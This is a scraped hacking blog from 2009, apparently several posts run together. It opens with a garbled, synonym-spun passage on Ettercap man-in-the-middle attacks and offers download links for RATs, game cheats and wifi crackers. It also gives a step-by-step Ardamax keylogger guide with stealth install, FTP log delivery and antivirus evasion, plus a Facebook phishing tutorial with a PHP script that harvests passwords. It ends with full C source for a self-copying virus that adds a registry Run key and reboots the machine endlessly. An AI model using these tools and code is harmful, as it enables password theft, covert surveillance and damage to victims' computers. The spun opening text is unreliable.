</div><div align="justify" style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Evidently, actuality a MiTM, there can be amaranthine possibilities as to the things you can do. If you can apprehend all packets and dispense all packets – again what’s to stop you authoritative the network? There are a few added basics that we haven’t covered in this article, and that would be more good larboard for you to analyze yourself. One of these possibilities is sniffing SSL (Secure Socket Layer) traffic, such as defended logins for sites like Hotmail (Secure Version), Banks, Online Stores, etc. It is above the ambit of this article, but the basics abaft it accommodate arising your own SSL Affidavit instead of accepting the company’s SSL affidavit issued, all the while bluffing the DNS requests, and capturing all packets with wireshark. These are again decrypted with SSLDump into a animal reable form, area any passwords can be apprehend by you. Obviously, this can acquire badly adverse furnishings to your boilerplate user who doesn’t appraise certificates.<br />
</div><div align="justify" style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Another achievability is re-directing all cartage to a assertive website. This can acutely be acclimated for fun – but what if addition acclimated this to accomplishment your PC? If they scanned your computer with Nmap, and ample out what casework and versions you were running, they could again bulk out if you had annihilation accommodating and actualize a webpage (that is locally hosted) through Metasploit, and again get Ettercap to alter all cartage to the folio – whereupon they will be exploited and you will acquire Root ascendancy of their system. You can angel how adverse this can be.<br />
</div><div align="justify" style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">One added added achievability is that of added admission into the network. Imagine this – a applicant computer is accurate with the server based on it’s arrangement abode or fingerprint. This arrangement abode is again baseborn by you with your MiTM attack, appropriately authoritative you arise like that applicant to the server. The server would again accord you the priveleges of that applicant area you commonly would not acquire priveleges – addition ample aegis blackmail for administrators. These are aloof a few added account for possibilities that can be accomplished through Ettercap – you are alone apprenticed by your imagination, so acquire a comedy about and bulk some things out.<br />
</div></span><br />
</div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-5308861377975435332009-09-24T22:17:00.000+07:002009-09-24T22:17:33.261+07:00Garena Hack 5.7c<div class="post uncustomized-post-template"> <a href="" name="8960260589062695955"></a> <h3 class="post-title"> Garena Hack 5.7c </h3><div class="post-body"> <div align="center"><a href="http://hackinggod.blogspot.com/"><img alt="Garena Hack 5.7c" src="http://i27.tinypic.com/35bvw3s.jpg" style="border: medium none;" title="Garena Hack 5.7c" /></a></div><br />
Released a new Garena Hack 5.7c.<br />
<br />
<b>Garena Hack 5.7c:</b><br />
- Protection not see running hacks<br />
- Hack is running version 1.23 & 1.24<br />
- No message at the beginning where it is written that your ACC banned ..<br />
- Gold 100 Exp 15 min Basic 50 exp even when you do not <a href="" id="AdBriteInlineAd_play" name="AdBriteInlineAd_play" style="-moz-background-clip: border; -moz-background-inline-policy: continuous; -moz-background-origin: padding; background: transparent url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x scroll center bottom; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top">play</a><br />
- No need to wait 5 seconds that would go into the room<br />
- Flooding can be non-stop<br />
<br />
<div id="news-id-30023"><b>Instructions for use:</b><br />
1) Run the downloaded file in garena.exe folder and log in using your login Garen<br />
2) In the folder with the downloaded Garena Haq Find the file Launch.bat through it we will run!<br />
3) After clicking on Launch.bat blue window will appear where you must select the option for which version Var3 its run or even separately!<br />
4) In this blue box, <a href="" id="AdBriteInlineAd_click" name="AdBriteInlineAd_click" style="-moz-background-clip: border; -moz-background-inline-policy: continuous; -moz-background-origin: padding; background: transparent url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x scroll center bottom; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top">click</a> 1 and enter, then we test fails, skip it and press any key)<br />
5) Everything is ready:<br />
Go through Launch.bat only the folder.<br />
<br />
<b>Size: </b>13.03 Mb<br />
<br />
<b>Download:</b><br />
<a href="http://uploading.com/files/196femca/GH_5.7c.rar/" target="_blank">http://uploading.com/files/196femca/GH_5.7c.rar/</a><br />
<br />
<b>Mirror:</b><br />
<a href="http://bitroad.net/download/91f940e027dc14188e4a33bcacdf5ca30/GH_5.7c.rar.html" target="_blank">http://bitroad.net/download/91f940e027dc14...H_5.7c.rar.html</a></div></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-80330448872694207902009-09-24T22:15:00.002+07:002009-09-24T22:15:28.338+07:00Pain Rat v0.1 Beta 9<div align="center" style="color: black;"><span style="font-size: 7px;">Pain Rat v0.1 Beta 9 </span><br />
</div><div align="center" style="color: black;"> <br />
</div><div align="center" style="color: black;"><a class="fw_link_website" href="http://www.mediafire.com/?ytijmzlymvo"><img border="0" class="fw_image_url fwSizeProp" src="http://i38.tinypic.com/vik8zd.jpg" style="height: 461px; margin: 8px; width: 558px;" /></a><br />
</div><div align="center" style="color: black; font-weight: bold;"><span style="font-size: 130%;"><a class="fw_link_website" href="http://www.mediafire.com/?ytijmzlymvo">Download here </a></span><br />
</div><span style="font-weight: bold;">Password: HackTheDarkness.com </span>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-63571191359382499652009-09-24T22:01:00.000+07:002009-09-24T22:01:06.047+07:00xHacker<span class="post-icons"><span class="item-action"><a href="http://www.blogger.com/email-post.g?blogID=7346187914388933348&postID=3843397490394862588" title="Email Post"><span class="email-post-icon"></span> </a> </span> <span class="item-control blog-admin pid-1264754267"> <a href="http://www.blogger.com/post-edit.g?blogID=7346187914388933348&postID=3843397490394862588" title="Edit Post"> <span class="quick-edit-icon"> </span> </a> </span> </span> <br />
<div class="post uncustomized-post-template"> <a href="" name="1355545430147447308"></a> <h3 class="post-title"> xHacker Pro 3.0 </h3><div class="post-body"> <a class="fw_link_website" href="http://hackinggod.blogspot.com/"><img border="0" class="fw_image_url fwSizeProp" src="http://i38.tinypic.com/2qnunb4.png" style="height: 273px; margin: 8px; width: 299px;" /></a><br />
<div align="center" style="color: black; font-weight: bold;"><span style="font-size: 130%;"><a class="fw_link_website" href="http://rapidshare.com/files/60827684/xHacker.3..rar"> Download here</a></span><br />
</div></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-63196055593172802582009-09-24T22:00:00.002+07:002009-09-24T22:00:17.706+07:00LAN HACKING _ TURKOJAN<div class="post uncustomized-post-template"> <a href="" name="3843397490394862588"></a> <h3 class="post-title"> Turkojan v4.0 Gold </h3><div class="post-body"> <div align="center" style="color: black;"><a class="fw_link_website" href="http://rapidshare.com/files/120899117/Turkojan-gold.rar"><img border="0" class="fw_image_url fwSizeProp" src="http://i37.tinypic.com/25i1ams.jpg" style="height: 420px; margin: 8px; width: 370px;" /></a><br />
</div><div align="center" style="color: black;"><a href="http://rapidshare.com/files/120899117/Turkojan-gold.rar" style="font-weight: bold;"><span style="font-size: 130%;">DOWNLOAD HERE</span></a><br />
</div></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-50615672232398305782009-09-24T21:57:00.002+07:002009-09-24T21:57:53.554+07:00Wifi Hacks 2009 AIO<div class="post uncustomized-post-template"> <a href="" name="2334492851271607340"></a> <h3 class="post-title"> <a href="http://radendito.tk/">Wifi Hacks 2009 AIO</a> </h3><div class="post-body"> <a href="http://hackinggod.blogspot.com/"><img border="0" src="http://i82.servimg.com/u/f82/12/82/64/77/wifiha10.png" style="height: 277px; width: 271px;" /></a> <br />
Thsi object has mass changed tools to hack adn craze wifi so ytou can habit your neighbors internet anbd effect whatever Tools for Win<span id="more-696"></span>dows and Linux further smoe gratifyingly strikingly tools!.<br />
<br />
<a href="http://rapidshare.com/files/262928298/Wifi.Hacks"><strong>Download Wifi Hacks 2009 AIO </strong></a><br />
</div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-43227573446706422352009-09-24T21:53:00.000+07:002009-09-24T21:53:35.377+07:00HACK ANYONE WITH ARMADAX KEYLOGGER<div class="post uncustomized-post-template"> <a href="" name="3389428649744091384"></a> <h3 class="post-title"> <a href="http://radendito.tk/">HACK ANYONE WITH ARMADAX KEYLOGGER</a> </h3><div class="post-body"> <span style="font-family: courier new; font-size: 85%;">I HACK MANAY PASSWORD USING THIS WONDERFUL TOOL ITS VERY EASY TO HACK SOME ONE</span><br />
<br />
<br />
<span style="font-family: times new roman;">Ardamax keylogger is now very old keylogger and usually detected by most antiviruses. Though old, it is still one of most used Keyloggers. We can use Binders and Crypters to make Ardamax keylogger FUD (Fully UnDetectable). So, I will inform you about Ardamax Keylogger install and use in this article. I have provided link for software download.... just read on.</span> <span style="font-family: times new roman;">~~Step By Step Guide~~</span> <br />
<div face="times new roman" style="text-align: left;">1.First Of All Download Armadax Keylogger From <a href="http://www.ziddu.com/download/5528360/ArmadaxKeylogger2.8wihserial.rar.html">Here </a><br />
<br />
<br />
<a href="http://www.ziddu.com/download/5528360/ArmadaxKeylogger2.8wihserial.rar.html" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" src="http://www.cg-blog.com/wp-content/uploads/2007/04/download.gif" style="cursor: pointer; display: block; height: 50px; margin: 0px auto 10px; text-align: center; width: 48px;" /></a><br />
2. After downloading, unzip Ardamax keylogger using Winzip Or Winrar<br />
<br />
<br />
<br />
3. Now, after installing, you will get Ardamax log icon in task bar. Right click on it and select "Enter registration key" and make it full version by entering serial key from Serial key.txt file.<br />
<br />
4. Go to http://www.drivehq.com and sign up for free FTP account. You need this to direct your keylogger logs and then access these logs. These are the logs that will give you desired passwords. After logging in your FTP account (make sure you are at Online Storage), create a new folder with name "Logs".<br />
<br />
5. Now, right click on Ardamax taskbar icon and select "Remote Installation"<br />
<br />
<a href="http://hackinggod.blogspot.com/" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" src="http://img.brothersoft.com/screenshots/softimage/d/drivehq_email_manager-185750-1240642009.jpeg" style="cursor: pointer; display: block; height: 301px; margin: 0px auto 10px; text-align: center; width: 409px;" /></a><br />
<br />
6. Click on "Next" to get Appearance screen. Here, click on "Additional components" and untick "Log Viewer" and hit Next.<br />
<br />
8. On Web Update screen, simply click Next.<br />
<br />
9. Now, you come to Options, and select apt options as you need. eg: It is better to have keylogger run in Stealth mode - so tick "Start in hidden mode" and so on. Click on Next.<br />
<br />
10. On "Control" screen, check the box "Send log every" and put time as 30 minutes. Then, in delivery, uncheck "Email" and check "FTP". Leave Include as it is. And uncheck "Send only if log size exceeds". Proceed with "Next".<br />
<br />
11. Now, on FTP, enter as below:<br />
FTP Host: http://ftp.drivehq.com<br />
Remote folder: Logs (the one you've created in Step 4)<br />
Username and password: Enter your FTP Username and pass (from Step 4).<br />
<br />
12. In "Control" check every box and hit "Next".<br />
<br />
13. In Screenshots screen, you can put your own values and hit "Next" to come to Destination. Choose the Keylogger Engine path where you want to put the keylogger on your computer<br />
. Untick "Open the folder containing the keylogger engine" to avoid yourself from being keylogged. Choose the icon you want to use for keylogger. Now, click "Next" and then "Finish".<br />
<br />
<br />
14. Now, when you have keylogger engine ready. But, this is detected by antivirus as hacktool and so we have to bypass antivirus detection<br />
<br />
So U need A Good Crypter For Undetect ur Server.exe File<br />
<br />
Open This Website U Get So Many Crypters Get It From <a href="http://www.google.co.in/url?q=http://hackhound.org/forum/binderscrypterspackers/&ei=MAhVSofCKoK4swPXkIjJDg&sa=X&oi=smap&resnum=1&ct=result&cd=3&usg=AFQjCNFB5JCVL1x0c73i3SIE0ykvDYmhnw">Here</a><br />
<br />
<span style="color: #cc0000;">Note:-</span> Your antivirus may detect the downloaded Ardamax keylogger file as virus. Please deactivate your antivirus while installing this Ardamax keylogger. Don't worry, I never play such cheap pranks of hacking my readers.<br />
</div><span style="font-family: times new roman;">So guys, I hope this </span><strong style="font-family: times new roman;"><span style="color: #000066;">Ardamax keylogger tutoria</span>l</strong><span style="font-family: times new roman;"> will help you in installing Ardamax keylogger for hacking passwords. Remember, ardamax keylogger is detected as hacktool (virus) by most antivirus. So, dont forget to crypt and bind your keylogger file. If you have any problem in using Ardamax keylogger to hack email passwords, please mention it in comments.</span><br />
<br />
<span style="color: #cc0000;">HelpFul Vedios</span><br />
<br />
<br />
<a href="http://www.youtube.com/watch?v=bzbYak3CFGM" style="font-family: times new roman;">http://www.youtube.com/watch?v=bzbYak3CFGM</a></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-66042035983568474262009-09-24T21:47:00.001+07:002009-09-24T21:48:31.960+07:00Garena Hack v3.3 | Warcraft 1.24b Maphack<div class="post uncustomized-post-template"><a href="http://www.blogger.com/post-create.do" name="6025621558547154085"></a> <br />
<h3 class="post-title"><a href="http://radendito.tk/">Garena Hack v3.3 | Warcraft 1.24b Maphack</a> </h3><div class="post-body">The New Garena <input name="IL_MARKER" type="hidden" />Hack 3.3 is released by GarenaHack-er, this version has built in <span style="color: #0099ff; font-family: Verdana,sans-serif; font-size: 13.2667px; font-style: normal; font-weight: 400; text-decoration: underline;">Custom Kick</span>, Diabolic <span style="color: #0099ff; font-family: Verdana,sans-serif; font-size: 13.2667px; font-style: normal; font-weight: 400; text-decoration: underline;">Warcraft 3</span> Toolkit and <span style="color: #0099ff; font-family: Verdana,sans-serif; font-size: 13.2667px; font-style: normal; font-weight: 400; text-decoration: underline;">Warcraft 1</span>.24b maphack. You can use this Garena <span style="color: #0099ff; font-family: Verdana,sans-serif; font-size: 13.2667px; font-style: normal; font-weight: 400; text-decoration: underline;">Hack</span> with any Garena update. There are no MEGA Exp in this Garena <input name="IL_MARKER" type="hidden" />Hack, even the original one doesn't have it. Read the guide and <a href="http://www.blogger.com/post-create.do" id="AdBriteInlineAd_Download" name="AdBriteInlineAd_Download" style="-moz-background-clip: border; -moz-background-inline-policy: continuous; -moz-background-origin: padding; background: transparent url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x scroll center bottom; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top">download</a> the Garena <input name="IL_MARKER" type="hidden" />Hack v3.3 with <input name="IL_MARKER" type="hidden" />Warcraft 1.24b maphack.<br />
<a href="http://hackinggod.blogspot.com/" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5381316529227903826" src="http://1.bp.blogspot.com/_EPMdGmZirp0/Sq5G3zSRM1I/AAAAAAAAAbQ/NtUVDECywLM/s320/garena-hack.PNG" style="cursor: pointer; display: block; height: 103px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><span style="color: red; font-weight: bold;">Step by Step Guide (for noobs):</span><br />
<br />
• Download GarenaHack_4.04_v3.exe from the link above.<br />
<br />
• Install it in your Garena Folder.<a href="http://hackinggod.blogspot.com/"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5379480805823716530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2AYiurLG1-MBHvotZrW_-BTbl6rrZa-W_5CqWSlQvz8vE5xi0cdIr3Adw6tZHXCPq06BPQ2rnd-UzlUqFiQfzpnQjR5fzbTM9pDcIaSdoOqZh6l8YHrVTc5tOJO5vJs0Rseb6uJEO9Ib1/s400/icon.PNG" style="cursor: pointer; float: right; height: 70px; margin: 0pt 0pt 10px 10px; width: 86px;" /></a><br />
<br />
• After installing run "GarenaHack" from Desktop. <span style="font-size: 85%;"><span style="font-style: italic;">(see icon imge on right)</span></span><br />
<br />
• A pop-up will appear, just <a href="http://www.blogger.com/post-create.do" id="AdBriteInlineAd_click" name="AdBriteInlineAd_click" style="-moz-background-clip: border; -moz-background-inline-policy: continuous; -moz-background-origin: padding; background: transparent url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x scroll center bottom; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top">click</a> "YES"<br />
<br />
<a href="http://hackinggod.blogspot.com/"><span style="color: blue;"><b><img alt="" border="0" onload="NcodeImageResizer.createOn(this);" src="http://img215.imageshack.us/img215/9954/40569260.png" style="height: 122px; width: 359px;" /></b></span></a><br />
<br />
• Now click, "Start Garena <input name="IL_MARKER" type="hidden" />Hack v3.3"<br />
<br />
<a href="http://hackinggod.blogspot.com/"><img alt="http://i27.tinypic.com/2u55f1w.jpg" src="http://i27.tinypic.com/2u55f1w.jpg" style="height: 121px; width: 331px;" /></a><br />
<br />
• Garena <input name="IL_MARKER" type="hidden" />Hack window will pop-up.<br />
<br />
<a href="http://hackinggod.blogspot.com/"><img alt="" border="0" onload="NcodeImageResizer.createOn(this);" src="http://img134.imageshack.us/img134/5008/63324146.png" style="height: 380px; width: 392px;" /></a><br />
<br />
• Now click "Start Garena Client - MapHack 1.24b - <input name="IL_MARKER" type="hidden" />Custom Kick"<br />
<br />
<a href="http://hackinggod.blogspot.com/"><img alt="http://i29.tinypic.com/33zdzpd.jpg" src="http://i29.tinypic.com/33zdzpd.jpg" style="height: 122px; width: 439px;" /></a><br />
<br />
• A pop-up window will appear, click start..<br />
<br />
<a href="http://hackinggod.blogspot.com/"><img alt="http://i25.tinypic.com/2nvgjsw.jpg" src="http://i25.tinypic.com/2nvgjsw.jpg" style="height: 132px; width: 355px;" /></a><br />
<br />
• Another pop-up will appear, but this time you know what to do ^^.<br />
<br />
<a href="http://hackinggod.blogspot.com/"><img alt="http://i28.tinypic.com/20keruu.jpg" src="http://i28.tinypic.com/20keruu.jpg" style="height: 158px; width: 368px;" /></a><br />
<br />
<br />
<span style="color: red; font-weight: bold;">NOTES:</span><br />
• Run Garena <input name="IL_MARKER" type="hidden" />hack by following the steps above, stricly<br />
• GarenaHack.exe and Garena.exe must not be in same directory (it must be in a sub-directory), if you see this, delete the folder, and reinstall Garena & Garenahack.<br />
• There is no MegaEXP in this <input name="IL_MARKER" type="hidden" />hack.<br />
• There is no virus in this <input name="IL_MARKER" type="hidden" />hack, if your antivirus say anything, just disable it.<br />
• If any Garena update comes, * Update it normally but after the update, when the Garena client is started automatically again, close it, and the click "Start Garena" again from the GarenaHack. If you don't do this probably nothing will happen. But it's best if you do this.<br />
</div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-80689525740474504852009-09-15T01:21:00.000+07:002009-09-15T01:21:51.268+07:00Great Hacking - Tutorials (How to Hack):<span class="post-icons"><span class="item-action"><a href="http://www.blogger.com/email-post.g?blogID=7346187914388933348&postID=7568456846572151569" title="Email Post"><span class="email-post-icon"></span> </a> </span> <span class="item-control blog-admin pid-1264754267"> <a href="http://www.blogger.com/post-edit.g?blogID=7346187914388933348&postID=7568456846572151569" title="Edit Post"> <span class="quick-edit-icon"> </span> </a> </span> </span> <br />
<div class="post uncustomized-post-template"> <a href="" name="1713101990393527155"></a> <h3 class="post-title"> <a href="http://hackinggod.blogspot.com/2009/09/great-hacking-tutorials-how-to-hack.html"><br />
</a> </h3><div class="post-body"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_5WS-ojJJTI2fZUGH7qEL0zbnXx8K7FxayXubcMi2zrfB1woNbsT_w6lhdw93E5ADo_Cv8p4Ru9dAbCBaLEnCWFipaOpMFGgd_EHCu9JdMUb2ZiKV7ShMLLlZJSNYccu3my8Pk-YhPO6u/s1600-h/images.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5375555646599561810" src="http://1.1.1.1/bmi/2.bp.blogspot.com/_tQYNJYW94e4/SpnPYTHpglI/AAAAAAAAAEU/1TCGchZ54Cc/s320/images.jpg" style="cursor: pointer; display: block; height: 124px; margin: 0px auto 10px; text-align: center; width: 104px;" /></a><br />
<h2 face="Helvetica,Arial,sans-serif" id="post-132" size="1.4em" style="color: black; line-height: 1em; margin: 0px 0px 10px; padding: 0px; text-decoration: none;">Great Hacking - Tutorials</h2><span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: 12px; line-height: 16px;"><div class="entry" style="margin: 0px 0px 10px; padding: 0px; text-align: justify;"><div style="margin: 5px 0px; padding: 5px 0px;">DownloadLink:</div><div style="margin: 5px 0px; padding: 5px 0px;"><a href="http://rapidshare.com/files/84527148/Great_Hacking_-_Tutorials.rar" style="color: #466edb; margin: 0px; padding: 0px; text-decoration: none;" target="_blank" title="http://rapidshare.com/files/84527148/Great_Hacking_-_Tutorials.rar">http://rapidshare.com/files/84527148/Great_Hacking_-_Tutorials.rar</a></div><div style="margin: 5px 0px; padding: 5px 0px;">*******************************END***********************************</div></div></span></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-7407910452052532102009-09-15T00:33:00.001+07:002009-09-15T00:33:34.311+07:00hack password facebook<div class="post uncustomized-post-template"> <a href="" name="7625076559949716106"></a> <h3 class="post-title"> <a href="http://hackinggod.blogspot.com/2009/09/how-to-hack-facebook-password.html">How to hack facebook password</a> </h3><div class="post-body"> <strong>Learn to hack facebook passwords</strong><br />
<br />
Are you curious to <span style="font-weight: bold;">"hack facebook password"</span> well then this post is just for you,Most people ask me to tell us the easiest way to <span style="font-weight: bold;">hack facebook password</span>,so here are some ways to <span style="font-weight: bold;">hack facebook password:</span><br />
<br />
1.Fake login page<br />
2.Keylogging<br />
3.Facebook new features<br />
4.virus<br />
<span class="fullpost"><br />
<br />
<span style="font-weight: bold;">Update:Due to recent complains i have elobrated the post and change the login script please check it out</span><br />
<br />
Today we will focus on the easiest way i.e <span style="font-weight: bold;">Fake login page</span><br />
A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.<br />
<br />
<a href="http://hackinggod.blogspot.com/" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="Facebook phishing" border="0" src="http://1.1.1.3/bmi/i654.photobucket.com/albums/uu264/rbsoulhunter17/images1.jpg" style="cursor: pointer; display: block; height: 56px; margin: 0px auto 10px; text-align: center; width: 150px;" /></a><br />
<br />
First of all download <a href="http://www.ziddu.com/download/6354448/Facebookfakepagerafayhackingarticles.rar.html"><span style="font-weight: bold;">facebook fake login page:</span></a><br />
<br />
PROCEDURE:<br />
<br />
1.once you have downloded facebook fake loginpage now extract contents in a folder<br />
2.In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.<br />
Save it .<br />
3.Open Fake page in wordpad<br />
4.Now press ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php<br />
5.Create an id in <span style="font-weight: bold;">www.110mb.com </span>, because i know about that site quite well.<br />
<br />
6.Then upload the contents into a directory<br />
<br />
7.For that,after creating an id you should go to file manager and upload all these files.<br />
<br />
8.Then just got to Facebook.htm and try out whether its working .<br />
After you type the file , a password file named pass.txt will be created in the same directory .<br />
Then you can see what username and password you have entered.<br />
<br />
<h4><strong>Update:I have found another working php script you can also try this</strong></h4><blockquote><span style="color: red;">header("Location: http://WEBSITE ");<br />
$handle =<br />
<br />
fopen("pass.txt", "a");<br />
foreach($_GET as<br />
<br />
$variable => $value) {<br />
fwrite($handle,<br />
<br />
$variable);<br />
fwrite($handle, "=");<br />
<br />
fwrite($handle, $value);<br />
fwrite($handle,<br />
<br />
"\r\n");<br />
}<br />
fwrite($handle, "\r\n");<br />
fclose($handle);<br />
exit;</span><br />
</blockquote><br />
<br />
In this way you can <span style="font-weight: bold;">Hack a facebook password</span><br />
<span style="font-weight: bold;"><br />
<span style="font-style: italic;">Warning:This tutorial "How to hack facebook password </span>" is for educational purposes</span></span></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-13982246737899318362009-09-14T01:36:00.002+07:002009-09-14T01:36:32.913+07:00Virus Program to Restart the Computer at Every Startup<span class="meta"><a class="comment-link" href="http://hackuniversal.blogspot.com/2009/09/virus-program-to-restart-computer-at.html#comments" onclick=""></a> </span><a href="http://www.gohacking.com/wp-content/uploads/2008/12/virus.jpg"><img alt="" class="alignleft size-full wp-image-200" height="300" src="http://1.1.1.4/bmi/www.gohacking.com/wp-content/uploads/2008/12/virus.jpg" title="virus" width="300" /></a><br />
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.<br />
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, <strong>none of the antivirus softwares detect’s this as a virus </strong>since I have coded this virus in <strong>C</strong>. So if you are familiar with <strong>C language</strong> then it’s too easy to understand the logic behind the coding.<br />
Here is the source code.<br />
#include<stdio.h><br />
#include<dos.h><br />
#include<dir.h></dir.h></dos.h></stdio.h><br />
int found,drive_no;char buff[128];<br />
void findroot()<br />
{<br />
int done;<br />
struct ffblk ffblk; <span style="color: #009900;">//File block structure</span><br />
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); <span style="color: #009900;">//to determine the root drive</span><br />
if(done==0)<br />
{<br />
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); <span style="color: #009900;">//to determine whether the virus is already installed or not</span><br />
if(done==0)<br />
{<br />
found=1; <span style="color: #009900;">//means that the system is already infected</span><br />
return;<br />
}<br />
drive_no=1;<br />
return;<br />
}<br />
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if<br />
(done==0)<br />
{<br />
found=1;return;<br />
}<br />
drive_no=2;<br />
return;<br />
}<br />
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=3;<br />
return;<br />
}<br />
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=4;<br />
return;<br />
}<br />
else<br />
exit(0);<br />
}<br />
void main()<br />
{<br />
FILE *self,*target;<br />
findroot();<br />
if(found==0) <span style="color: #009900;">//if the system is not already infected</span><br />
{<br />
self=fopen(_argv[0],”rb”); <span style="color: #009900;">//The virus file open’s itself</span><br />
switch(drive_no)<br />
{<br />
case 1:<br />
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); <span style="color: #009900;">//to place a copy of itself in a remote place</span><br />
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
C:\\windows\\system\\ sysres.exe”); <span style="color: #009900;">//put this file to registry for starup</span><br />
break;<br />
case 2:<br />
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);<br />
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
D:\\windows\\system\\sysres.exe”);<br />
break;<br />
case 3:<br />
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);<br />
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
E:\\windows\\system\\sysres.exe”);<br />
break;<br />
case 4:<br />
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);<br />
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
CurrentVersion\\Run \/v sres \/t REG_SZ \/d<br />
F:\\windows\\system\\sysres.exe”);<br />
break;<br />
default:<br />
exit(0);<br />
}<br />
while(fread(buff,1,1,self)>0)<br />
fwrite(buff,1,1,target);<br />
fcloseall();<br />
}<br />
else<br />
system(”shutdown -r -t 0″); <span style="color: #009900;">//if the system is already infected then just give a command to restart<br />
</span>}<br />
<strong>NOTE:</strong> <span style="color: #009900;">COMMENTS ARE GIVEN IN GREEN COLOUR.</span><br />
<strong><span style="color: #990000;">Compiling The Scource Code Into Executable Virus.</span></strong><br />
<strong></strong><br />
<span style="color: #330033;">1. Download the <a href="http://www.gohacking.com/downloads/source_codes/SysRes.rar" rel="nofollow"><strong>Source Code Here</strong></a><br />
2. The downloaded file will be <strong>Sysres.C</strong><br />
3. For step-by-step compilation guide, <a href="http://hackuniversal.blogspot.com/2009/09/how-to-compile-c-programs.html" style="font-weight: bold;" target="_blank">How to compile C Programs</a><a href="http://hackuniversal.blogspot.com/2009/09/how-to-compile-c-programs.html"><span style="font-weight: bold;">.</span></a></span><br />
<strong><span style="color: #990000;">Testing And Removing The Virus From Your PC</span></strong><br />
<strong></strong><br />
You can compile and test this virus on your own PC without any fear.To test, just doubleclick the <strong>sysres.exe</strong> file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.<br />
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.<br />
1. Reboot your computer in the <strong>SAFE MODE</strong><br />
2. Goto<strong> X:\Windows\System</strong> (<strong>X</strong> can be C,D,E or F)<br />
